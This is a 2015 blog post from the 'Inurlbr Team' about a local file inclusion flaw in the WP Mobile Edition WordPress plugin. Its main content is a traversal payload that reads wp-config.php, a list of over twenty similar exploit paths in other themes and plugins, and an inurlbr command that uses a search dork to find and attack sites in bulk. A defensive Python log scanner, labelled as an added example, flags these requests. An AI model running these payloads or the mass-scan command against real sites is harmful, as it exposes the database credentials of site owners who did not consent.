Tuesday, 9 June 2015

WordPress Plugin 'WP Mobile Edition' LFI Vulnerability

Exploring WordPress plugin LFI using inurlbr in subprocess

Inurlbr Team
[+]=========== Assume NO ============[+]
Liability and are not responsible
for any misuse or damage caused
by this program!!
[+]==================================[+]

USAGE:

Make a file named payload.txt and put this line inside it:
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php

OTHER VULNERABILITIES (exploit paths):

/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-content/force-download.php?file=../wp-config.php
/wp-content/themes/acento/includes/view-pdf.php?download=1&file=/path/wp-config.php
/wp-content/themes/SMWF/inc/download.php?file=../wp-config.php
/wp-content/themes/markant/download.php?file=../../wp-config.php
/wp-content/themes/yakimabait/download.php?file=./wp-config.php
/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php
/wp-content/themes/felis/download.php?file=../wp-config.php
/wp-content/themes/MichaelCanthony/download.php?file=../../../wp-config.php
/wp-content/themes/trinity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/epic/includes/download.php?file=wp-config.php
/wp-content/themes/urbancity/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/antioch/lib/scripts/download.php?file=../../../../../wp-config.php
/wp-content/themes/authentic/includes/download.php?file=../../../../wp-config.php
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/wp-content/themes/lote27/download.php?download=../../../wp-config.php
/wp-content/themes/linenity/functions/download.php?imgurl=../../../../wp-config.php
/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=../../../wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/wamp/www/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///C:/xampp/htdocs/wp-config.php
/wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php
/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php


EXPLOIT COMMAND:
php inurlbr.php --dork 'inurl:?fdx_switcher=mobile' -q [your favorite engines] -s scan.txt --get-file 'payload.txt' --sub-get --unique
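From the defender's side, the paths listed above are exactly what shows up in a web server access log when someone runs this kind of scan. The following script is an added example, not part of the original post or of the inurlbr project: it parses Combined Log Format lines (assumed format; the sample lines, hosts and timestamps are constructed) and flags any request whose query parameters carry a `../` traversal, a `file:` URI, or a reference to `wp-config.php`, which covers every path in the list.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (Combined Log Format). Hosts and
# timestamps are made up; the request paths are the ones listed on this page.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Jun/2015:10:00:01 +0000] "GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Jun/2015:10:00:02 +0000] "GET /wp-content/plugins/justified-image-grid/download.php?file=file:///var/www/wp-config.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Jun/2015:10:00:03 +0000] "GET /?fdx_switcher=mobile HTTP/1.1" 200 8812 "-" "Mozilla/5.0"
198.51.100.7 - - [09/Jun/2015:10:00:04 +0000] "GET /wp-content/themes/acento/includes/view-pdf.php?download=1&file=%2e%2e%2f%2e%2e%2fwp-config.php HTTP/1.1" 200 2310 "-" "Mozilla/5.0"
192.0.2.9 - - [09/Jun/2015:10:00:05 +0000] "GET /wp-content/uploads/2015/06/photo.jpg HTTP/1.1" 200 51200 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# ".." as a whole path segment, with either slash style.
TRAVERSAL_RE = re.compile(r'(^|[/\\])\.\.([/\\]|$)')


def classify_request(target):
    """Return the reasons a request looks like a file-read attempt ([] if none)."""
    reasons = []
    parts = urlsplit(target)
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        # parse_qsl already decoded once; decode again so double-encoded
        # sequences such as %252e%252e%252f are caught as well.
        decoded = unquote(unquote(value))
        if TRAVERSAL_RE.search(decoded):
            reasons.append(f"traversal in {key}")
        if 'wp-config.php' in decoded.lower():
            reasons.append(f"wp-config.php named in {key}")
        if decoded.lower().startswith('file:'):
            reasons.append(f"file: URI in {key}")
    return reasons


def scan_log(text):
    """Return (ip, status, target, reasons) for each suspicious request in the log."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        reasons = classify_request(m['target'])
        if reasons:
            hits.append((m['ip'], int(m['status']), m['target'], reasons))
    return hits


if __name__ == '__main__':
    for ip, status, target, reasons in scan_log(SAMPLE_LOG):
        # A 200 means the handler served something; check whether wp-config.php left.
        print(f"{ip} {status} {target}\n    {', '.join(reasons)}")
```

Any hit with a 200 status against a path that is not an installed, patched component is worth treating as a possible credential exposure rather than just a probe.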

Video:

SCANNER INURLBR:
https://github.com/googleinurl/SCANNER-INURLBR

REF:
https://www.exploit-db.com/exploits/37244/
http://blog.inurl.com.br/2015/04/conceito-de-subprocess-scanner-inurlbr.html
